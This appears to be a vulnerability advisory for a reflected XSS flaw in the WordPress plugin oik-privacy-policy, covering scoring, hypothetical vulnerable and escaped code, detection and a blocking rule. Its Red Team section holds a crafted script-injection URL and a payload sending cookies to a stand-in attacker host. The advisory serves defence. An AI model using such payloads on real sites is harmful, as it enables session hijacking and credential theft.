CVE-2025-52743
Executive Summary
CVE-2025-52743 is a reflected Cross-Site Scripting (XSS) vulnerability in the WordPress plugin oik-privacy-policy, developed by Bobbingwide. The vulnerability exists in versions from n/a through 1.4.10. It allows an attacker to inject arbitrary web scripts or HTML via a crafted request, which is then reflected back to the victim's browser. This can lead to session hijacking, credential theft, or defacement. The CVSS score is 7.1 (High), and the EPSS score is 0.0%, indicating low exploitation likelihood at this time. No public exploit code or patch is currently available.

Supply Chain & Package Security
This vulnerability affects a WordPress plugin distributed through the official WordPress plugin repository. Users who have installed oik-privacy-policy from the WordPress dashboard or via direct download are at risk. Since the plugin is part of the WordPress ecosystem, supply chain risks include compromised plugin updates or malicious forks. Administrators should verify the integrity of their plugin files and monitor for any unauthorized changes.
CVSS Breakdown & Threat Level
- CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
- Base Score: 7.1 (High)
- Attack Vector: Network (AV:N)
- Attack Complexity: Low (AC:L)
- Privileges Required: None (PR:N)
- User Interaction: Required (UI:R) – victim must click a crafted link
- Scope: Changed (S:C) – the vulnerability can impact resources beyond the vulnerable component
- Confidentiality Impact: Low (C:L)
- Integrity Impact: Low (I:L)
- Availability Impact: Low (A:L)
Threat Level: High. Although user interaction is required, the low complexity and network attack vector make it attractive for phishing campaigns.
Deep Dive & Mechanics
The vulnerability is a reflected XSS in the oik-privacy-policy plugin. The plugin fails to properly sanitize user-supplied input before including it in the response. An attacker can craft a malicious URL containing JavaScript code. When a victim clicks the link, the malicious script executes in the context of the victim's browser, potentially allowing the attacker to steal cookies, session tokens, or perform actions on behalf of the victim.
Root Cause: The plugin uses $_GET or $_POST parameters directly in the output without proper escaping or validation. For example, a parameter like ?message=<script>alert('XSS')</script> might be reflected in the page.
Attack Vector: The attacker sends a crafted link to the victim via email, social media, or other channels. The victim must be logged into the WordPress site for the attack to be most effective.
Vulnerable vs. Patched Code
Since no patch is available, we can only describe the vulnerable code pattern.
Vulnerable Code (hypothetical):
<?php
$message = $_GET['message'];
echo "<div class='notice'>$message</div>";
?>
Patched Code (expected):
<?php
$message = isset($_GET['message']) ? esc_html($_GET['message']) : '';
echo "<div class='notice'>" . esc_html($message) . "</div>";
?>
The patched version uses esc_html() to escape HTML entities, preventing script injection.
Exploitation & Lab Setup
Red Team
Prerequisites:
- A WordPress site with
oik-privacy-policyversion <= 1.4.10 installed and activated. - A victim user with a valid session.
Exploitation Steps:
- Identify a vulnerable parameter. Common parameters include
message,error, orstatus. - Craft a malicious URL:
http://target-site.com/?oik-privacy-policy=1&message=<script>alert(document.cookie)</script> - Send the link to the victim via phishing email or social engineering.
- When the victim clicks the link, the script executes, and the attacker can capture the cookie.
Example Payload:
<script>fetch('http://attacker.com/steal?cookie='+document.cookie)</script>
Blue Team
Detection:
- Monitor web server logs for unusual query parameters containing
<script>oronerrorpatterns. - Use WAF rules to block reflected XSS attempts.
- Deploy browser-based XSS filters (e.g., X-XSS-Protection header).
Hunting:
- Search for requests to
oik-privacy-policywith suspicious parameters. - Look for outbound connections to unknown domains from the WordPress server.
Indicators of Compromise (IOCs)
- Network IOCs:
- HTTP requests containing
oik-privacy-policywith script tags in parameters. - Outbound connections to attacker-controlled domains from the WordPress server.
- HTTP requests containing
- File IOCs:
- Modified plugin files (check file integrity).
- Suspicious entries in WordPress database (e.g.,
wp_optionswith injected scripts).
- Log IOCs:
- Web server logs showing
GET /?oik-privacy-policy=1&message=<script>...</script>.
- Web server logs showing

Remediation & Mitigation
Immediate Actions:
- Disable the plugin until a patch is released.
- Implement a Web Application Firewall (WAF) rule to block reflected XSS patterns.
- Educate users about phishing links and the risk of clicking suspicious URLs.
Long-term Fix:
- The vendor (Bobbingwide) should release a patched version that properly escapes output.
- Users should update to the latest version once available.
- Consider using a security plugin like Wordfence to add an extra layer of protection.
Workaround:
- Add the following
.htaccessrule to block malicious requests:RewriteEngine On RewriteCond %{QUERY_STRING} (message|error|status)=.*<script [NC] RewriteRule .* - [F,L]
